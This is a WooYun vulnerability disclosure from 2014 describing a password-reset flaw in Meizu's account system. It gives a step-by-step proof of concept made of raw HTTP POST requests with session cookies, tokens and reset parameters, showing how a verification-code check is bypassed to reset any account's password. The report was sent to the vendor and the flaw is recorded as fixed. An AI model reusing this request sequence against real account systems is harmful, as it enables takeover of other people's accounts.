当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078208

漏洞标题:魅族的账号系统内存在漏洞可导致任意账户的密码重置

相关厂商:魅族科技

漏洞作者: glzjin

提交时间:2014-10-06 20:15

修复时间:2014-11-20 20:16

公开时间:2014-11-20 20:16

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-06: 细节已通知厂商并且等待厂商处理中
2014-10-06: 厂商已经确认,细节仅向厂商公开
2014-10-16: 细节向核心白帽子及相关领域专家公开
2014-10-26: 细节向普通白帽子公开
2014-11-05: 细节向实习白帽子公开
2014-11-20: 细节向公众公开

简要描述:

魅族的密码找回系统存在缺陷,可绕过验证码从而重置任意账号密码,进而导致隐私泄露等不良后果

详细说明:

请见下文的漏洞证明,猜测主要是由于对于密码重置模块令牌的验证不严造成的。

漏洞证明:

1.首先进入这里,魅族的密码重置模块
https://member.meizu.com/forgetpwd
2.然后我们需要获取的是四种功能模块的包,分别是发送验证码,验证验证码是否正确的,以及获取令牌和重置密码的,这里我都获取好了,接下来我们直接用
发送验证码:

POST https://member.meizu.com/uc/system/vcode/sendEmailVcode HTTP/1.1
Host: member.meizu.com
Connection: keep-alive
Content-Length: 64
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://member.meizu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://member.meizu.com/uc/system/webjsp/forgetpwd/toMail?account=××××××××××××
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: _fgpwdtk=AXTK4CkEUfVC_C1NDGumKyOL6r_8-5kM3oRskFNFuOjRX8Z-WKSowkbe1MkEq6uNUEqtX9fxR9wgFq9bOoEi73xsAVRurOfKThdEJiZEEeQ0ELOzCuIMJlm9YMpMQhdcQT8xwDBBRtV7z08WGayOKv0HJszxDvS3s0F0Zdx9-QM*7MF-nQFGcjtSDNYJejrxOkDzzkQ5FE3WbW0o7UoYJw5GNswWeGpzqQCFbdxcT_rLeVU4_l_MIS2c8C_NpSiowUz7LMNB3RG5mmu3InK7R9qAfPpI4Cb5hMh5Ynq13Vv11y46d4LW-AaGqon48D06CA; JSESSIONID=m11ira64bg3rb4n5u6oi1oln46m
email=glzjin%40zhaojin97.cn&vCodeTypeValue=8&account=××××××××××××


验证验证码是否正确:

POST https://member.meizu.com/uc/system/vcode/isValidEmailVCodeForForgetPwd HTTP/1.1
Host: member.meizu.com
Connection: keep-alive
Content-Length: 77
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://member.meizu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://member.meizu.com/uc/system/webjsp/forgetpwd/toMail?account=×××××××××××
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: _fgpwdtk=AXTK4CkEUfVC_C1NDGumKyOL6r_8-5kM3oRskFNFuOjRX8Z-WKSowkbe1MkEq6uNUEqtX9fxR9wgFq9bOoEi73xsAVRurOfKThdEJiZEEeQ0ELOzCuIMJlm9YMpMQhdcQT8xwDBBRtV7z08WGayOKv0HJszxDvS3s0F0Zdx9-QM*7MF-nQFGcjtSDNYJejrxOkDzzkQ5FE3WbW0o7UoYJw5GNswWeGpzqQCFbdxcT_rLeVU4_l_MIS2c8C_NpSiowUz7LMNB3RG5mmu3InK7R9qAfPpI4Cb5hMh5Ynq13Vv11y46d4LW-AaGqon48D06CA; JSESSIONID=m11ira64bg3rb4n5u6oi1oln46m
account=×××××××××××&vCodeTypeValue=8&email=glzjin%40zhaojin97.cn&vcode=707054


获取令牌:

POST https://member.meizu.com/security/resubmit/token/get HTTP/1.1
Host: member.meizu.com
Connection: keep-alive
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://member.meizu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Referer: https://member.meizu.com/uc/system/webjsp/forgetpwd/toResetPwd?account=×××××××××××
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: JSESSIONID=m11ira64bg3rb4n5u6oi1oln46m; _fgpwdtk=PUF6F7bafqhWDa7pLRN-9G8pLVkM-ZOBb4lWiGtpuE7mpSGuCe0xElXwO059Ix2M35TSAUSgLDa2ZjDCKav3_hBcJObQo4580cuHuVw9nYOxsLJzyqRR5Tuoqmf0cEYG0TstMaLoTDOl4IqMOf3epsmhdjWMBKQCaZscRQa0xfs*7MF-nQFGcjtSDNYJejrxOkDzzkQ5FE3WbW0o7UoYJw4n6yE2ipq2dz-CtbX82Vj0Oad4x92et5f9vMdPm4hHI8jUZhujmD1YhvTHdQwnP583IuC0_lbQ23FJm0i5vQhRky9fCc0moGahkWAVTl_MXA


重置密码:

POST https://member.meizu.com/uc/system/webjsp/forgetpwd/resetPwd HTTP/1.1
Host: member.meizu.com
Connection: keep-alive
Content-Length: 125
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://member.meizu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://member.meizu.com/uc/system/webjsp/forgetpwd/toResetPwd?account=×××××××××××
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie: _fgpwdtk=PUF6F7bafqhWDa7pLRN-9G8pLVkM-ZOBb4lWiGtpuE7mpSGuCe0xElXwO059Ix2M35TSAUSgLDa2ZjDCKav3_hBcJObQo4580cuHuVw9nYOxsLJzyqRR5Tuoqmf0cEYG0TstMaLoTDOl4IqMOf3epsmhdjWMBKQCaZscRQa0xfs*7MF-nQFGcjtSDNYJejrxOkDzzkQ5FE3WbW0o7UoYJw4n6yE2ipq2dz-CtbX82Vj0Oad4x92et5f9vMdPm4hHI8jUZhujmD1YhvTHdQwnP583IuC0_lbQ23FJm0i5vQhRky9fCc0moGahkWAVTl_MXA; JSESSIONID=m11ira64bg3rb4n5u6oi1oln46m
form_resubmit_token_key=KH001S0NAMJE0HFNWTS2WNBTKDP57QVL&account=×××××××××××&resetPassword=laofuck&repeatPassword=laofuck


OK,准备齐全了,下面就给大家做现场的表演
1.首先我的目标账号是我朋友LANCE的账号(在这里特别感谢他允许我使用他的账号来测试)130××××××××
2.同样的我们进入那个账号查找页面,然后这样把账号填进去,进到这个页面

13.png


3.这时我们回到抓包那里,把COOKIE干出来

Cookie: Hm_lvt_2a0c04774115b182994cfcacf4c122e9=1412300296; Hm_lpvt_2a0c04774115b182994cfcacf4c122e9=1412300296; _ga=GA1.2.1012289249.1412300296; rememberLogin=; accountLogin=; passwordLogin=; _uid=; _keyLogin=; _uticket=; _islogin=; JSESSIONID=m2cpjjkteivjxr1o9d646pcjgqs; _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI


这里我们需要的是这一段

JSESSIONID=m2cpjjkteivjxr1o9d646pcjgqs; _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI


4.再拿出我们之前抓的找回密码那个包,我们替换些信息进去

POST https://member.meizu.com/uc/system/vcode/sendEmailVcode HTTP/1.1
Host: member.meizu.com
Connection: keep-alive
Content-Length: 64
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://member.meizu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://member.meizu.com/uc/system/webjsp/forgetpwd/toMail?account=15977441670
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie:  JSESSIONID=m2cpjjkteivjxr1o9d646pcjgqs; _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI
email=glzjin%40126.com&vCodeTypeValue=8&account=130‘********


注意,我这里替换的是COOKIE以及下面的账号那里,邮箱你要填上自己的
然后,就发送出去吧
5.然后我们的邮箱里收到了这封东西
130×××××××,您好:
感谢您使用Flyme服务。
您正在进行Flyme找回密码操作,请在30分钟内将此验证码:991344 输入验证码输入框,以完成验证。
此致
Flyme 项目组
把上面的验证码记下,我们继续玩
6.然后这里,我们来验证一下是否正确,同样的记住替换COOKIE和信息
验证验证码是否正确:

POST https://member.meizu.com/uc/system/vcode/isValidEmailVCodeForForgetPwd HTTP/1.1
Host: member.meizu.com
Connection: keep-alive
Content-Length: 77
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://member.meizu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://member.meizu.com/uc/system/webjsp/forgetpwd/toMail?account=×××××××××××
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie:  JSESSIONID=m2cpjjkteivjxr1o9d646pcjgqs; _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI
account=130××××××××&vCodeTypeValue=8&email=glzjin%40zhaojin97.cn&vcode=991344


返回是错误的,但不要在意,我们继续走
7.这时,我们来获取令牌了,记得把该替换的东西都替换了

POST https://member.meizu.com/security/resubmit/token/get HTTP/1.1
Host: member.meizu.com
Connection: keep-alive
Content-Length: 0
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://member.meizu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Referer: https://member.meizu.com/uc/system/webjsp/forgetpwd/toResetPwd?account=130×××××××
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie:  JSESSIONID=m2cpjjkteivjxr1o9d646pcjgqs; _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI


返回的是这些

{"code":"200","message":"","redirect":"","value":"JUG2VL7VKRDDZ156UZSXQ92TIOFWUY0L"}


我们需要的是value
8.然后,最后,我们替换好该替换的东西,重置密码吧!

POST https://member.meizu.com/uc/system/webjsp/forgetpwd/resetPwd HTTP/1.1
Host: member.meizu.com
Connection: keep-alive
Content-Length: 125
Accept: application/json, text/javascript, */*; q=0.01
Origin: https://member.meizu.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/31.0.1650.63 Safari/537.36 SE 2.X MetaSr 1.0
Content-Type: application/x-www-form-urlencoded
Referer: https://member.meizu.com/uc/system/webjsp/forgetpwd/toResetPwd?account=130×××××××
Accept-Encoding: gzip,deflate,sdch
Accept-Language: zh-CN,zh;q=0.8
Cookie:  JSESSIONID=m2cpjjkteivjxr1o9d646pcjgqs; _fgpwdtk=IuqfrXg2_z8GS2MV_eygPBPmC9phjbeIXUN01pHJz9zZGJkpRVduU7C95ufFwA9ce74hsTcsVI5aFdPKFXybfuBLnMQhZexixy2DxKvH0vIfwUeNTMVG3B3WZYfU1zbUZQPCV8aiLEh5yknycRLk2WbZMHkBL_x8Kz9iOb_pTcg*LKCpR-u2ekV3g8T9J7RVH6boDmDf_gHX1mOAEgJGgrAOiU4TVsjo-XvT2pEJ9PEC9R-80fnDs0kVLl7q9ZzXn6C0HkxUhP_erM2SGTJTck8iolS2tpXnVqnKPIxL1uTCdqik0LttUUwwUCEPKria-Ig0mWTbbTgWiolnJedESMI
form_resubmit_token_key=JUG2VL7VKRDDZ156UZSXQ92TIOFWUY0L&account=130×××××××&resetPassword=xibaxiba&repeatPassword=xibaxiba


OK,我们看到的,返回的是200和true,就是说我们成功的重置了密码
9.登陆试试

14.png


修复方案:

加强各模块的验证

abcd.jpg

版权声明:转载请注明来源 glzjin@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-10-06 21:14

厂商回复:

已通知相关人员进行处理。

最新状态:

2014-11-20:厂商已修复

2014-11-21:已修复